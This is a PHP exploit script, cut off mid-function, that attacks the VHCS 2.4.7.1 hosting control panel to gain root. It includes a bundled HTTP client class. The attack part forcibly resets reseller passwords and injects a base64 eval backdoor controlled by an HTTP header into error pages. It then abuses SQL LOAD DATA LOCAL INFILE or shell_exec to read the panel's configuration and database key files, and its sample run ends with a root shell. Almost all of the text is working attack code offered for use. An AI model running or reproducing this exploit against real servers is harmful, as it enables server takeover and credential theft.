VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit



#!/usr/bin/php -q

<?php
error_reporting
(E_ALL E_NOTICE);
#
#
# darkfig@darky:/# ./vhcs_sploit.php -url http://localhost/vhcs2/
#
#  VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
#  --------------------------------------------------

# About:
#  by DarkFig < gmdarkfig (at) gmail (dot) com >
#  http://acid-root.new.fr/
#  #acidroot@irc.worldnet.net

# Exploit:
#  + Logged in (Administrator)
#  + The administrator has 2 resellers
#  / Changing dareseller's password
#  / Trying to connect as dareseller:thatpwnz
#  + Login successful
#  + The reseller has 2 users
#  + Host domaintest.fr is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  - User  doesn't have SQL rights
#  / Host domaintest.fr isn't a valid user
#  + Host xpliamaclient.com is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  - User  doesn't have SQL rights
#  / Host xpliamaclient.com isn't a valid user
#  / Changing unautresel's password
#  / Trying to connect as unautresel:thatpwnz
#  + Login successful
#  + The reseller has 1 users
#  + Host thegoodone.com is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  / Trying to create a database
#  + Database 92xpl_db39 successfully created
#  + Using database id 12
#  / Trying to add SQL user
#  + User 93xpl_usr2 successfully created
#  + Using SQL user id 17
#  + Host thegoodone.com is a valid user
#  + Logged in (thegoodone.com - Client)
#  / Trying to load files via local_infile
#  + Ok: /etc/vhcs2/vhcs2.conf
#  + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
#  + Now you can execute commands as root =]
#  + root@thegoodone.com: id

# uid=0(root) gid=0(root)
#

##############################################
# THE VHCS CODE IS AFTER THE PHPSPLOIT CLASS
##############################################


/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 * You should have received a copy of the GNU General Public License 
 * along with this program; if not, write to the Free Software 
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 * 
 * TITLE:          PhpSploit Class
 * REQUIREMENTS:   PHP 4 / PHP 5
 * VERSION:        2.0
 * LICENSE:        GNU General Public License
 * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
 * FILENAME:       phpsploitclass.php
 *
 * CONTACT:        gmdarkfig@gmail.com (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without) a
 * basic authentification. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allow
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allow the script to follow all
 * redirections sent by the server). It can return the content (or the
 * headers) of the request. Others useful functions can be used for debugging.
 * A manual is actually in development but to know how to use it, you can
 * read the comments.
 *
 * CHANGELOG:
 *
 * [2007-06-10] (2.0)
 *  * Code: Code optimization
 *  * New: Compatible with PHP 4 by default
 *
 * [2007-01-24] (1.2)
 *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
 *  * New: multipart/form-data enctype is now supported 
 *
 * [2006-12-31] (1.1)
 *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
 *  * New: You can now call the getheader() / getcontent() function without parameters
 *
 * [2006-12-30] (1.0)
 *  * First version
 * 
 */

class phpsploit
{
    var 
$proxyhost;
    var 
$proxyport;
    var 
$host;
    var 
$path;
    var 
$port;
    var 
$method;
    var 
$url;
    var 
$packet;
    var 
$proxyuser;
    var 
$proxypass;
    var 
$header;
    var 
$cookie;
    var 
$data;
    var 
$boundary;
    var 
$allowredirection;
    var 
$last_redirection;
    var 
$cookiejar;
    var 
$recv;
    var 
$cookie_str;
    var 
$header_str;
    var 
$server_content;
    var 
$server_header;
    

    
/**
     * This function is called by the
     * get()/post()/formdata() functions.
     * You don't have to call it, this is
     * the main function.
     *
     * @access private
     * @return string $this->recv ServerResponse
     * 
     */
    
function sock()
    {
        if(!empty(
$this->proxyhost) && !empty($this->proxyport))
           
$socket = @fsockopen($this->proxyhost,$this->proxyport);
        else
           
$socket = @fsockopen($this->host,$this->port);
        
        if(!
$socket)
           die(
"Error: Host seems down");
        
        if(
$this->method=='get')
           
$this->packet 'GET '.$this->url." HTTP/1.1\r\n";
           
        elseif(
$this->method=='post' or $this->method=='formdata')
           
$this->packet 'POST '.$this->url." HTTP/1.1\r\n";
           
        else
           die(
"Error: Invalid method");
        
        if(!empty(
$this->proxyuser))
           
$this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
        
        if(!empty(
$this->header))
           
$this->packet .= $this->showheader();
           
        if(!empty(
$this->cookie))
           
$this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
    
        
$this->packet .= 'Host: '.$this->host."\r\n";
        
$this->packet .= "Connection: Close\r\n";
        
        if(
$this->method=='post')
        {
            
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
            
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
            
$this->packet .= $this->data."\r\n";
        }
        elseif(
$this->method=='formdata')
        {
            
$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
            
$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
            
$this->packet .= $this->data;
        }

        
$this->packet .= "\r\n";
        
$this->recv '';

        
fputs($socket,$this->packet);

        while(!
feof($socket))
           
$this->recv .= fgets($socket);

        
fclose($socket);

        if(
$this->cookiejar)
           
$this->getcookie();

        if(
$this->allowredirection)
           return 
$this->getredirection();
        else
           return 
$this->recv;
    }
    

    
/**
     * This function allows you to add several
     * cookies in the request.
     * 
     * @access  public
     * @param   string cookn CookieName
     * @param   string cookv CookieValue
     * @example $this->addcookie('name','value')
     * 
     */
    
function addcookie($cookn,$cookv)
    {
        if(!isset(
$this->cookie))
           
$this->cookie = array();

        
$this->cookie[$cookn] = $cookv;
    }


    
/**
     * This function allows you to add several
     * headers in the request.
     *
     * @access  public
     * @param   string headern HeaderName
     * @param   string headervalue Headervalue
     * @example $this->addheader('Client-IP', '128.5.2.3')
     * 
     */
    
function addheader($headern,$headervalue)
    {
        if(!isset(
$this->header))
           
$this->header = array();
           
        
$this->header[$headern] = $headervalue;
    }


    
/**
     * This function allows you to use an
     * http proxy server. Several methods
     * are supported.
     * 
     * @access  public
     * @param   string proxy ProxyHost
     * @param   integer proxyp ProxyPort
     * @example $this->proxy('localhost',8118)
     * @example $this->proxy('localhost:8118')
     * 
     */
    
function proxy($proxy,$proxyp='')
    {
        if(empty(
$proxyp))
        {
            
$proxarr explode(':',$proxy);
            
$this->proxyhost $proxarr[0];
            
$this->proxyport = (int)$proxarr[1];
        }
        else 
        {
            
$this->proxyhost $proxy;
            
$this->proxyport = (int)$proxyp;
        }

        if(
$this->proxyport 65535)
           die(
"Error: Invalid port number");
    }
    

    
/**
     * This function allows you to use an
     * http proxy server which requires a
     * basic authentification. Several
     * methods are supported:
     *
     * @access  public
     * @param   string proxyauth ProxyUser
     * @param   string proxypass ProxyPass
     * @example $this->proxyauth('user','pwd')
     * @example $this->proxyauth('user:pwd');
     * 
     */
    
function proxyauth($proxyauth,$proxypass='')
    {
        if(empty(
$proxypass))
        {
            
$posvirg strpos($proxyauth,':');
            
$this->proxyuser substr($proxyauth,0,$posvirg);
            
$this->proxypass substr($proxyauth,$posvirg+1);
        }
        else
        {
            
$this->proxyuser $proxyauth;
            
$this->proxypass $proxypass;
        }
    }


    
/**
     * This function allows you to set
     * the 'User-Agent' header.
     * 
     * @access  public
     * @param   string useragent Agent
     * @example $this->agent('Firefox')
     * 
     */
    
function agent($useragent)
    {
        
$this->addheader('User-Agent',$useragent);
    }

    
    
/**
     * This function returns the headers
     * which will be in the next request.
     * 
     * @access  public
     * @return  string $this->header_str Headers
     * @example $this->showheader()
     * 
     */
    
function showheader()
    {
        
$this->header_str '';
        
        if(!isset(
$this->header))
           return;
           
        foreach(
$this->header as $name => $value)
           
$this->header_str .= $name.': '.$value."\r\n";
           
        return 
$this->header_str;
    }

    
    
/**
     * This function returns the cookies
     * which will be in the next request.
     * 
     * @access  public
     * @return  string $this->cookie_str Cookies
     * @example $this->showcookie()
     * 
     */
    
function showcookie()
    {
        
$this->cookie_str '';
        
        if(!isset(
$this->cookie))
           return;
        
        foreach(
$this->cookie as $name => $value)
           
$this->cookie_str .= $name.'='.$value.'; ';

        return 
$this->cookie_str;
    }


    
/**
     * This function returns the last
     * formed http request.
     * 
     * @access  public
     * @return  string $this->packet HttpPacket
     * @example $this->showlastrequest()
     * 
     */
    
function showlastrequest()
    {
        if(!isset(
$this->packet))
           return;
        else
           return 
$this->packet;
    }


    
/**
     * This function sends the formed
     * http packet with the GET method.
     * 
     * @access  public
     * @param   string url Url
     * @return  string $this->sock()
     * @example $this->get('localhost/index.php?var=x')
     * @example $this->get('http://localhost:88/tst.php')
     * 
     */
    
function get($url)
    {
        
$this->target($url);
        
$this->method 'get';
        return 
$this->sock();
    }

    
    
/**
     * This function sends the formed
     * http packet with the POST method.
     *
     * @access  public
     * @param   string url  Url
     * @param   string data PostData
     * @return  string $this->sock()
     * @example $this->post('http://localhost/','helo=x')
     * 
     */    
    
function post($url,$data)
    {
        
$this->target($url);
        
$this->method 'post';
        
$this->data $data;
        return 
$this->sock();
    }
    

    
/**
     * This function sends the formed http
     * packet with the POST method using
     * the multipart/form-data enctype.
     * 
     * @access  public
     * @param   array array FormDataArray
     * @return  string $this->sock()
     * @example $formdata = array(
     *                      frmdt_url => 'http://localhost/upload.php',
     *                      frmdt_boundary => '123456', # Optional
     *                      'var' => 'example',
     *                      'file' => array(
     *                                frmdt_type => 'image/gif',  # Optional
     *                                frmdt_transfert => 'binary' # Optional
     *                                frmdt_filename => 'hello.php,
     *                                frmdt_content => '<?php echo 1; ?>'));
     *          $this->formdata($formdata);
     * 
     */
    
function formdata($array)
    {
        
$this->target($array[frmdt_url]);
        
$this->method 'formdata';
        
$this->data '';
        
        if(!isset(
$array[frmdt_boundary]))
           
$this->boundary 'phpsploit';
        else
           
$this->boundary $array[frmdt_boundary];

        foreach(
$array as $key => $value)
        {
            if(!
preg_match('#^frmdt_(boundary|url)#',$key))
            {
                
$this->data .= str_repeat('-',29).$this->boundary."\r\n";
                
$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
                
                if(!
is_array($value))
                {
                    
$this->data .= "\r\n\r\n".$value."\r\n";
                }
                else
                {
                    
$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";

                    if(isset(
$array[$key][frmdt_type]))
                       
$this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";

                    if(isset(
$array[$key][frmdt_transfert]))
                       
$this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";

                    
$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
                }
            }
        }

        
$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
        return 
$this->sock();
    }

    
    
/**
     * This function returns the content
     * of the server response, without
     * the headers.
     * 
     * @access  public
     * @param   string code ServerResponse
     * @return  string $this->server_content
     * @example $this->getcontent()
     * @example $this->getcontent($this->get('http://localhost/'))
     * 
     */
    
function getcontent($code='')
    {
        if(empty(
$code))
           
$code $this->recv;

        
$code explode("\r\n\r\n",$code);
        
$this->server_content '';
        
        for(
$i=1;$i<count($code);$i++)
           
$this->server_content .= $code[$i];

        return 
$this->server_content;
    }

    
    
/**
     * This function returns the headers
     * of the server response, without
     * the content.
     * 
     * @access  public
     * @param   string code ServerResponse
     * @return  string $this->server_header
     * @example $this->getcontent()
     * @example $this->getcontent($this->post('http://localhost/','1=2'))
     * 
     */
    
function getheader($code='')
    {
        if(empty(
$code))
           
$code $this->recv;

        
$code explode("\r\n\r\n",$code);
        
$this->server_header $code[0];
        
        return 
$this->server_header;
    }

    
    
/**
     * This function is called by the
     * cookiejar() function. It adds the
     * value of the "Set-Cookie" header
     * in the "Cookie" header for the
     * next request. You don't have to
     * call it.
     * 
     * @access private
     * @param  string code ServerResponse
     * 
     */
    
function getcookie()
    {
        foreach(
explode("\r\n",$this->getheader()) as $header)
        {
            if(
preg_match('/set-cookie/i',$header))
            {
                
$fequal strpos($header,'=');
                
$fvirgu strpos($header,';');
                
                
// 12=strlen('set-cookie: ')
                
$cname  substr($header,12,$fequal-12);
                
$cvalu  substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
                
                
$this->cookie[trim($cname)] = trim($cvalu);
            }
        }
    }


    
/**
     * This function is called by the
     * get()/post() functions. You
     * don't have to call it.
     *
     * @access  private
     * @param   string urltarg Url
     * @example $this->target('http://localhost/')
     * 
     */
    
function target($urltarg)
    {
        if(!
ereg('^http://',$urltarg))
           
$urltarg 'http://'.$urltarg;
           
        
$urlarr     parse_url($urltarg);
        
$this->url  'http://'.$urlarr['host'].$urlarr['path'];
        
        if(isset(
$urlarr['query']))
           
$this->url .= '?'.$urlarr['query'];
        
        
$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
        
$this->host $urlarr['host'];
        
        if(
$this->port != '80')
           
$this->host .= ':'.$this->port;

        if(!isset(
$urlarr['path']) or empty($urlarr['path']))
           die(
"Error: No path precised");

        
$this->path substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);

        if(
$this->port 65535)
           die(
"Error: Invalid port number");
    }
    
    
    
/**
     * If you call this function,
     * the script will extract all
     * 'Set-Cookie' headers values
     * and it will automatically add
     * them into the 'Cookie' header
     * for all next requests.
     *
     * @access  public
     * @param   integer code 1(enabled) 0(disabled)
     * @example $this->cookiejar(0)
     * @example $this->cookiejar(1)
     * 
     */
    
function cookiejar($code)
    {
        if(
$code=='0')
           
$this->cookiejar=FALSE;

        elseif(
$code=='1')
           
$this->cookiejar=TRUE;
    }


    
/**
     * If you call this function,
     * the script will follow all
     * redirections sent by the server.
     * 
     * @access  public
     * @param   integer code 1(enabled) 0(disabled)
     * @example $this->allowredirection(0)
     * @example $this->allowredirection(1)
     * 
     */
    
function allowredirection($code)
    {
        if(
$code=='0')
           
$this->allowredirection=FALSE;
           
        elseif(
$code=='1')
           
$this->allowredirection=TRUE;
    }

    
    
/**
     * This function is called if
     * allowredirection() is enabled.
     * You don't have to call it.
     *
     * @access private
     * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
     * @return string $this->get($this->last_redirection)
     * @return string $this->recv;
     * 
     */
    
function getredirection()
    {
        if(
preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
        {
            
$this->last_redirection trim($codearr[2]);
            
            if(!
ereg('://',$this->last_redirection))
               return 
$this->get('http://'.$this->host.$this->path.$this->last_redirection);

            else
               return 
$this->get($this->last_redirection);
        }
        else
           return 
$this->recv;
    }


    
/**
     * This function allows you
     * to reset some parameters.
     * 
     * @access  public
     * @param   string func Param
     * @example $this->reset('header')
     * @example $this->reset('cookie')
     * @example $this->reset()
     * 
     */
    
function reset($func='')
    {
        switch(
$func)
        {
            case 
'header':
            
$this->header = array('');
            break;
                
            case 
'cookie':
            
$this->cookie = array('');
            break;
                
            default:
            
$this->cookiejar '';
            
$this->header = array('');
            
$this->cookie = array('');
            
$this->allowredirection '';
            break;
        }
    }
}


class 
vhcs_xpl extends phpsploit
{
    var 
$sleep_time 4;

    
#  -rw-r--r-- 1 root root
    
var $conf_path '/etc/vhcs2/vhcs2.conf';

    
# -r-------- 1 www-data www-data
    
var $keys_path '/var/www/vhcs2/gui/include/vhcs2-db-keys.php';

    var 
$head_arr = array(
            
'admin/index.php'       => 3,
        
'reseller/index.php'    => 2,
        
'../reseller/index.php' => 2,
        
'client/index.php'      => 1,
        
''                        => 0);

    var 
$privileges = array(
        
=> 'Administrator',
        
=> 'Reseller',
        
=> 'Client');

    var 
$reg_arr = array(
            
=> '#edit_reseller\.php\?edit_id=([0-9]+)" class="link">(.*) </a> </td>#i',
        
=> '#edit_user.php\?edit_id=([0-9]+)" class="link">(.*)</a></td>#i',
        
=> '#delete_sql_database\.php\?id=([0-9]+)#i',
        
=> '#delete_sql_database\.php\?id=([0-9]+)#i',
        
=> '#sql_execute_query.php\?id=([0-9]+)#i');

    var 
$flags = array(
       -
=> '-',
        
=> '/',
        
=> '+');

    function 
main()
    {
        
$this->agent('Mozilla Firefox');
        
$this->cookiejar(1);

        
$this->mhead();

        
$this->uri      $this->getparam('url'TRUE);
        
$this->url_arr  parse_url($this->uri);

        
$this->patch $this->getparam('patch');
        
$this->proxh $this->getparam('proxhost');
        
$this->proxa $this->getparam('proxauth');

        if(
$this->proxh)
           
$this->proxy($this->proxh);

        if(
$this->proxa)
           
$this->proxyauth($this->proxa);

        print 
"\nExploit:";
        
$this->type $this->login();

        if(empty(
$this->type))
        {
            if(!
$this->patch)
            {
                
$this->msg('A patch has been applied to this website', -1);
                
$this->msg("See RoMaNSoFt's advisory for more details", -1);
                
$this->msg('Try with the -patch option', -11);
            }
            else
               
$this->msg('Bad username/password', -11);
        }

        
$this->msg("Logged in (".$this->usr.' - '.$this->privileges[$this->type].')'1);

        
$this->allowredirection(1);

        
$this->get_vhcs_conf();

        
$this->exec_cmd();

        return;
    }


    function 
getparam($param$nec=FALSE)
    {
        global 
$argv;

        foreach(
$argv as $value => $key)
        {
            if(
$key === '-'.$param)
               return 
$argv[$value+1];
        }

        if(
$nec)
           
$this->usage();
        
        return 
FALSE;
    }

    function 
mhead()
    {
        print 
"\n VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit";
        print 
"\n --------------------------------------------------\n";
        print 
"\nAbout:";
        print 
"\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
        print 
"\n http://acid-root.new.fr/";
        print 
"\n #acidroot@irc.worldnet.net";
        print 
"\n";
    
        return;
    }
    
    function 
usage()
    {
        print 
"\nUsage:";
        print 
"\n vhcsxpl.php -url <url> [options...]\n";
        print 
"\nOptions:";
        print 
"\n -patch <user:pwd>     Unofficial patch applied";
        print 
"\n -proxhost <ip>        If you wanna use a proxy";
        print 
"\n -proxauth <usr:pwd>   Proxy with authentication\n";
        print 
"\n";
    
        exit(
1);
    }

    function 
log_as()
    {
        
$this->msg("Trying to connect as ".$this->usr.':'.$this->pwd0);
        
$this->allowredirection(1);

        
$this->post($this->uri.'chk_login.php',
        
'uname='.$this->usr.'&upass='.$this->pwd.'&Submit=+++Login+++');

        
$this->redir_type $this->get_type_by_redir();

        if(
$this->redir_type == 0)
           
$this->msg('Login attempt failed', -1);

        else
           
$this->msg('Login successful'1);

        return 
$this->redir_type;
    }

    function 
get_type_by_redir()
    {
        
$this->redir_arr parse_url($this->last_redirection);
            
        
$this->allowredirection(0);

        return 
$this->head_arr[$this->redir_arr['path']];
    }
    
    function 
login()
    {
        if(
$this->patch)
        {
            
$this->idents explode(':'$this->patch);
            list(
$this->usr$this->pwd) =    $this->idents;

            
$this->type $this->log_as();

            return 
$this->log_as_user();
        }
        else
        {
            
$this->get($this->uri.'admin/manage_users.php');

            
$this->type 3;

            if(
ereg('add_user\.php'$this->getcontent()))
               return 
$this->log_as_user();

            else
               return 
0;
        }
    }

    function 
log_as_user()
    {
        if(
$this->type == 3)
           
$this->logged_as_admin();

        if(
$this->type == 2)
           
$this->logged_as_reseller();

        if(
$this->type == 1)
        {
            if(!
$this->patch)
               return 
1;

            else
               return 
$this->valid_user();
        }

        else
           return 
0;
    }

    function 
valid_user()
    {
        if(
$this->write_code())
        {
            
# open_basedir + safe_mode
            
if($this->is_safe())
            {
                if(
$this->bypass_with_db())
                   return 
1;

                else
                   return 
0;
            }
            else
               return 
1;
        }
        return 
0;        
    }

    function 
logged_as_admin()
    {
        
$this->msg('Logged in ('.$this->privileges[3].')'1);

        
$this->get($this->uri.'admin/manage_users.php');

        
preg_match_all($this->reg_arr[1], $this->getcontent(), $resellers);

        
$this->reseller_count count($resellers[1]);

        
$this->msg('The administrator has '.$this->reseller_count.' resellers'1);

        for(
$i=0$i<$this->reseller_count$i++)
        {    
            
$this->usr $resellers[2][$i];
            
$this->pwd 'thatpwnz';

            if(!
$this->patch)
               {
                
$this->msg('Changing '.$resellers[2][$i]."'s password"0);

                
$this->reseller_dat '';

                
$this->get($this->uri.'admin/edit_reseller.php?edit_id='.$resellers[1][$i]);

                
# only checked ip
                
preg_match_all('#name="ip_([0-9]+)" value="asgned" checked#i',
                
$this->getcontent(), $reseller_ips);

                
$this->ip_count count($reseller_ips[1]);
                
$this->ip_dat '';

                for(
$j=0$j<$this->ip_count$j++)
                {
                    
$this->ip_dat .= 'ip_'.$reseller_ips[1][$j].'=asgned';

                        if(
$j != $this->ip_count-1)
                             
$this->ip_dat .= '&';
                }

                
# Change reseller's password/mail
                # This is needed if it was run without -path
                # Because we can't click on the 'Change' button.
                #
                # pwd: thatpwnz
                # mail: <reseller_name>@ohyeah.com
                #
                
$this->post($this->uri.'admin/edit_reseller.php',
                
'username='.$resellers[2][$i].'&pass=thatpwnz&'.
                
'pass_rep=thatpwnz&email='.$resellers[2][$i].''.
                
'%40ohyeah.com&nreseller_max_domain_cnt=0&nres'.
                
'eller_max_subdomain_cnt=0&nreseller_max_alias'.
                
'_cnt=0&nreseller_max_mail_cnt=0&nreseller_max'.
                
'_ftp_cnt=0&nreseller_max_sql_db_cnt=0&nresell'.
                
'er_max_sql_user_cnt=0&nreseller_max_traffic=0'.
                
'&nreseller_max_disk=0&'.$this->ip_dat.'&custo'.
                
'mer_id=&fname=&lname=&firm=&zip=&city=&countr'.
                
'y=&street1=&street2=&phone=&fax=&Submit=++Upd'.
                
'ate++&uaction=update_reseller&edit_id='.
                
$resellers[1][$i].'&edit_username='.
                
$resellers[2][$i]);

                if(
$this->log_as() != 2)
                   return 
0;
            }
            else
            {
                
$this->allowredirection(1);

                
$this->get($this->uri.'admin/change_user_interface.php?to_id='.$resellers[1][$i]);

                if(
$this->get_type_by_redir() != 2)
                   return 
0;
            }

            if(
$this->logged_as_reseller())
               return 
1;

            
$this->reset('cookie');
            
$this->get($this->uri.'reseller/change_user_interface.php?action=go_back');
        }

        return 
0;
    }

    function 
logged_as_reseller()
    {
        
$this->get($this->uri.'reseller/users.php');

        
preg_match_all($this->reg_arr[2], $this->getcontent(), $users);
        
        
array_walk($users[2], 'trim');
        
        
$this->user_count count($users[1]);
        
        
$this->msg('The reseller has '.$this->user_count' users'1);

        
$this->patch FALSE;

        for(
$i=0$i<$this->user_count$i++)
        {
            if(
$this->is_alive($users[2][$i]))
            {
                
$this->usr $users[2][$i];

                
$this->type 1;

                
$this->msg('Host '.$this->usr.' is connected'1);

                
$this->get($this->uri.'reseller/change_user_interface.php?to_id='.$users[1][$i]);

                if(
$this->valid_user())
                {
                    
$this->msg('Host '.$this->usr.' is a valid user'1);
                    return 
TRUE;
                }
                else
                   
$this->msg("Host ".$this->usr." isn't a valid user"0);
            }
            else
               
$this->msg('Host '.$users[2][$i].' seems down', -1);

            
$this->get($this->uri.'client/change_user_interface.php?action=go_back');
        }

        return 
FALSE;
    }

    function 
bypass_with_db()
    {
        
$this->get($this->dmn_vhcs_url.'client/index.php');

        if(!
ereg('manage_sql.php'$this->getcontent()) and !$edit)
        {
            
$this->msg("User ".$this->ur." doesn't have SQL rights", -1);

            return 
FALSE;
        }
        
        
# No database
        
if(!$this->got_db())
        {
            
$this->msg('Trying to create a database'0);

            
$this->tmp_db_name rand(0,100).'xpl_db'.rand(0,100);

            
# Database: ..xpl_db..
            
$this->post($this->dmn_vhcs_url.'client/add_sql_database.php',
            
'db_name='.$this->tmp_db_name.'&id_pos=start&Submit=++Add++&'.
            
'uaction=add_db');

            if(
$this->got_db())
               
$this->msg('Database '.$this->tmp_db_name.' successfully created'1);

            else
            {
                
$this->msg("Can't create the database ".$this->tmp_db_name0);

                return 
FALSE;
            }
        }

        
# First database
        
$this->db_id $this->sql_db_ids[1];

        
$this->msg('Using database id '.$this->db_id1);

        if(!
$this->got_db_user())
        {
            
$this->msg('Trying to add SQL user'0);

            
$this->tmp_db_user rand(0,100).'xpl_usr'.rand(0,100);
            
            
# SQL user: ..xpl_usr..:xpl_pwd
            
$this->post($this->dmn_vhcs_url.'client/sql_add_user.php',
            
'user_name='.$this->tmp_db_user.'&id_pos=end&pass=xpl_pw'.
            
'd&pass_rep=xpl_pwd&Add_New=++Add++&uaction=add_user&id='.
            
$this->db_id);

            if(
$this->got_db_user())
               
$this->msg('User '.$this->tmp_db_user.' successfully created'1);

            else
            {
                
$this->msg("Can't create the SQL user ".$this->tmp_db_user0);

                return 
FALSE;
            }
        }

        
# First SQL user id associed with the database
        
$this->db_user_id $this->sql_usrs[1];

        
$this->msg('Using SQL user id '.$this->db_user_id1);

        return 
TRUE;
    }

    function 
got_db_user()
    {        
        
$this->get($this->dmn_vhcs_url.'client/manage_sql.php');

        
$this->content_arr explode("\n"$this->getcontent());

        
$this->is_sql_db_usr FALSE;

        for(
$i=0$i<count($this->content_arr); $i++)
        {
            if(
preg_match($this->reg_arr[4],
            
$this->content_arr[$i], $this->sql_db_id))
            {
                if(
$this->sql_db_id[1] == $this->db_id)
                   
$this->is_sql_db_usr TRUE;

                else
                   
$this->is_sql_db_usr FALSE;
            }

            if(
preg_match($this->reg_arr[5],
            
$this->content_arr[$i], $this->sql_usrs))
            {
                if(
$this->is_sql_db_usr)
                   return 
TRUE;
            }
        }
        return 
FALSE;
    }

    function 
got_db()
    {    
        
$this->get($this->dmn_vhcs_url.'client/manage_sql.php');

        
preg_match($this->reg_arr[3],
        
$this->getcontent(), $this->sql_db_ids);

        if(empty(
$this->sql_db_ids))
           return 
FALSE;

        else
           return 
TRUE;
    }

    function 
is_alive($domain_name)
    {
        if(
gethostbyname($domain_name) != $domain_name)
           return 
TRUE;

        else
           return 
FALSE;
    }

    function 
write_code()
    {
        
$this->msg('Trying to write PHP code'0);

        
$this->dmn_url      'http://'.$this->usr;
        
$this->dmn_vhcs_url $this->dmn_url.$this->url_arr['path'];

        
$this->get($this->dmn_url.'/errors/404/index.php');
        
$this->old_404 $this->getcontent();

        
$this->phpc =
         
'<?php '
        
.'error_reporting(0); '
        
.'if(isset($_SERVER[\'HTTP_SHELL\'])) '
        
.'{ eval(base64_decode($_SERVER[\'HTTP_SHELL\'])); exit(0); } '
        
.'?>';

        
$this->new_404 $this->phpc.$this->old_404;

        
$this->post($this->dmn_vhcs_url.'client/error_pages.php',
        
'error='.urlencode($this->new_404).'&uaction=updt_error&eid=404&Submit=+Save+');

        
$this->exec_php('print "itworkz";');

        if(
ereg('itworkz'$this->getcontent()))
        {
            
$this->msg('PHP code successfully written'1);

            return 
TRUE;
        }
        else
        {
            
$this->msg("Can't write PHP code", -1);

               return 
FALSE;
        }
    }

    function 
get_vhcs_conf()
    {
        if(
$this->safe_mode)
           
$this->msg('Trying to load files via local_infile'0);

        else
           
$this->msg('Trying to load files via shell_exec'0);

        
$this->lf_conf   $this->path_content($this->conf_path);
        
$this->lf_conf   trim($this->lf_conf"\r");

        
$this->vhcs_conf explode("\n"$this->lf_conf);

        
$this->conf = array();

        foreach(
$this->vhcs_conf as $this->conf_line)
        {
            
# comment
            
if(!ereg('^(\s*)#'$this->conf_line))
            {
                
$this->pos   strpos($this->conf_line'=');
                
$this->name  strtoupper(trim(substr($this->conf_line0$this->pos)));
                
$this->value trim(substr($this->conf_line$this->pos+1));

                
$this->conf[$this->name] = $this->value;
            }
        }

        
$this->php_keys_code $this->path_content($this->keys_path);

        return;
    }

    function 
path_content($path)
    {
        
# open_basedir On/off
        # safe_mode = Off
        
if(!$this->safe_mode)
        {
            
$this->phpc 'print shell_exec("cat '.$path.'");';

            
$this->exec_php($this->phpc);

            
$this->file_content $this->getcontent();

        }

        
# open_basedir On/Off
        # safe_mode = On
        
else
        {
            
$this->rand_table rand().'tmp_hax'.rand();

            
$this->sql_query =
            
"CREATE TABLE ".$this->rand_table." (content text not null); ".
            
"LOAD DATA LOCAL INFILE '$path' INTO TABLE ".$this->rand_table.
            
" FIELDS TERMINATED BY '__EOF__' ESCAPED BY '' LINES TERMINAT".
            
"ED BY '__EOF__'; SELECT CONCAT(CHAR(80,87,78,69,68,67,79,78,".
            
"84,69,78,84),HEX(content),CHAR(80,87,78,69,68,67,79,78,84,69".
            
",78,84)) FROM ".$this->rand_table."; DROP TABLE ".
            
$this->rand_table;

            
$this->sql_arr explode(';'$this->sql_query);
            
$this->sql_cnt count($this->sql_arr);

            for(
$i=0$i<$this->sql_cnt$i++)
            {
                
$this->sql_res $this->exec_sql($this->sql_arr[$i]);

                if(
$i == $this->sql_cnt-2)
                   
$this->file_content $this->sql_res;
            }
            
        }

        if(!
$this->file_content)
        {
            
$this->msg("A problem occurred while trying to read the file $path", -1);
            
            if(
$this->safe_mode)
               
$this->msg("local_infile=Off or we don't have sufficient access rights to the file", -12);

            else
               
$this->msg("We don't have sufficient access rights to the file", -1, -2);
        }
        else
           
$this->msg("Ok: $path"1);

        return 
$this->file_content;
    }

    function 
exec_sql($query)
    {
        
$this->post($this->dmn_vhcs_url.'client/sql_execute_query.php',
        
'user_name=&sql_query='.$query.'&Submit=+Execute+&uaction=exe'.
        
'cute_query&id='.$this->db_user_id);

        
$this->sql_result '';

        if(
ereg('PWNEDCONTENT'$this->getcontent()))
        {
            
